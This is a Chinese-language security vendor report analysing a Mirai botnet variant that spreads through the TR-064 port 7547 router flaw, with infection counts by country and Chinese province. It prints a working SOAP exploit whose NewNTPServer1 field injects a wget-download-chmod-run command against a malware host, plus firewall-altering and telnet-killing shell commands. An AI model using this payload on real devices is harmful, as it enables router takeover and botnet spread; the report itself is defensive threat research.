研究报告

安天追影小组分析Mirai变种新传播方式

      安天联合电信云堤发布针对Mirai新变种威胁分析报告,利用捕风蜜罐捕获到Mirai新变种,该变种采用最近公布的7547端口漏洞,并对公布漏洞的payload进行了修改使之可以下载执行Mirai。通过互联网流量监控发现了大量IoT设备进行7547端口扫描,这些设备已经被新Mirai变种攻陷,目前监测到超过30万IoT设备感染。

 

      近期披露的D1000TR064 服务器 TCP 端口 7547漏洞,通过发送某些 TR 064 命令,可以指示运行该服务的设备打开防火墙上的 80端口。允许从互联网访问设备的web 管理界面。D1000 的默认登录密码是默认 Wi-fi 密码,也可以通过另一个TR064指令获取。该漏洞关键代码是向端口7547发送TR 064命令,设置新NTP服务器的方式,在NewNTPServer1中采用指令iptables -IINPUT -p tcp --dport 80 -j ACCEPT解除防火墙对80访问限制。以下是重要的代码片段:
 


 

      Mirai变种的C&C配置加密方式与源码泄露的家族没有变化。连接C&C服务器timeserver.host(5.8.65.138)的23端口,上线包数据为0x00000001。

      在被感染的路由器执行以下命令:

busybox  iptables -A INPUT -p tcp --destination-port 7547 -j DROP

busybox  killall -9 telnetd


      第一个命令是关闭7547端口,是为了避免重复感染,也使其他攻击者不能再利用这个漏洞;第二个命令是停止telnet服务,使用户无法远程更新固件。然后,生成随机IP,对这些IP的7547端口进行扫描与漏洞入侵。样本利用7547漏洞进行了相应的改造,使攻击直接下载远程样本,修改可执行模式并且运行。该样本中包含三个远程样本URL,分别为:http://l.ocalhost.host/1、http:// l.ocalhost.host/2、http:// l.ocalhost.host/3。

 

      攻击代码POST数据如下:

 

      <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> 

      <SOAP-ENV:Body>  

      <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   

      <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/3;chmod 777 3;./3`</NewNTPServer1>   

      <NewNTPServer2></NewNTPServer2>   

      <NewNTPServer3></NewNTPServer3>   

      <NewNTPServer4></NewNTPServer4>   

      <NewNTPServer5></NewNTPServer5>  

      </u:SetNTPServers> 

      </SOAP-ENV:Body>

      </SOAP-ENV:Envelope>

 

       该放马域名l.ocalhost.host是黑客利用漏洞快速传播Mirai变种之前新注册2016年11月26日解析的IP包括两个:


      2016-11-28 5.8.65.140


      2016-11-27 188.209.49.60

 

      通过电信云堤抽样流量分析获得如下信息:

 

  • 确认被感染具有7547扫描能力的节点主要通过包括扫描节点自身是IoT设备,扫描节点多次使用相同端口扫描,扫描节点发出攻击漏洞方法进行发现。

  • 确认感染设备总数:306778

  • 感染设备主要开放服务或设备信息包括RomPager/4.07、DVRDVS、TR069 Connect Request Server、DHT Nodes、HuaweiHomeGateway。


      目前发现感染的主要节点分布地区 (列表)
 

地区 感染设备总数
巴西 107166
英国 61854
爱尔兰 18268
拉美其它地区 17210
土耳其 13863
伊朗 11573
澳大利亚 8002
泰国 7159
意大利 6243
芬兰 5294
智利 4937
阿根廷 3659
中国 3321
法国 2160
巴基斯坦 2095
其它北美地区(非美国) 1916
希腊 1712
罗马尼亚 1485
印度 1197
西班牙 1187
越南 761
俄罗斯 599
德国 529
美国 488
马来西亚 471
其它欧洲和中东地区 367
瑞典 352
玻利维亚 341
格鲁吉亚 341
其它欧洲地区 260
新西兰 224
塞尔维亚 169
捷克 140
南非 108
其它亚太地区 102
瑞士 98
哥伦比亚 91
阿尔巴尼亚 87
其它非洲地区 79
马达加斯加 75
摩洛哥 72
丹麦 69
波斯尼亚和黑塞哥维那 67
洪都拉斯 67
秘鲁 64
埃及 43
爱沙尼亚 33
日本 31
阿塞拜疆 30
波兰 27
圣马力诺 26
斯洛伐克 15
印度尼西亚 13
立陶宛 11
利比亚 11
阿曼 10
韩国 10
科威特 10
阿联酋 9
葡萄牙 9
奥地利 7
菲律宾 7
荷兰 7
乌克兰 7
叙利亚 6
阿尔及利亚 5
巴拉圭 5
塞内加尔 5
也门 5
巴勒斯坦 4
巴林 4
冈比亚 4
加拿大 4
卢森堡 4
马尔代夫 4
萨尔瓦多 4
伊拉克 4
比利时 3
哈萨克斯坦 3
拉脱维亚 3
新加坡 3
新喀里多尼亚 3
冰岛 2
科特迪瓦 2
黎巴嫩 2
挪威 2
沙特阿拉伯 2
坦桑尼亚 2
以色列 2
多米尼加 1
佛得角 1
黑山 1
加蓬 1
老挝 1
孟加拉 1
摩尔多瓦 1
莫桑比克 1
尼泊尔 1
尼日利亚 1
所罗门群岛 1
委内瑞拉 1
乌兹别克斯坦 1
亚美尼亚 1


      国内部分感染节点分布图:

 


注:本图由电信云堤提供
 

国内感染节点分布表
 

省份 感染设备总数
广东省 508
江苏省 345
浙江省 240
福建省 219
湖北省 186
上海市 182
山东省 176
湖南省 148
四川省 131
河南省 107
北京市 94
广西省 93
安徽省 92
河北省 89
云南省 78
辽宁省 77
陕西省 62
天津市 56
江西省 55
山西省 55
贵州省 51
重庆市 51
吉林省 40
黑龙江省 38
甘肃省 31
香港 17
海南省 17
台湾 11
西藏自治区 5
宁夏回族自治区 4
青海省 2
澳门 尚未发现

 

      参考文献链接:
 

      [1].   http://www.vfocus.net/art/20161109/13085.html
 

      [2].  https://www.broadband-forum.org/technical/download/TR-064.pdf

 

      注:

 

      本分析报告由安天追影小组与电信云堤联合发布,如您认为对网络安全有价值,请转载时注明,并附上链接。

 

      本分析报告错漏缺点在所难免,敬请业内专家和研究者回帖指点批评指正。

按访问者
政府
运营商
金融
能源
合作伙伴
新闻媒体
求职者
关于我们
公司概况
工作机会
大事记
部分客户
公司荣誉
诚聘英才
常用链接
产品综述
终端侧安全
威胁深度鉴定
引擎类
态势感知
威胁响应
公告与报告
服务与支持
服务与支持
软件升级
售后服务
安全培训服务
安全技术服务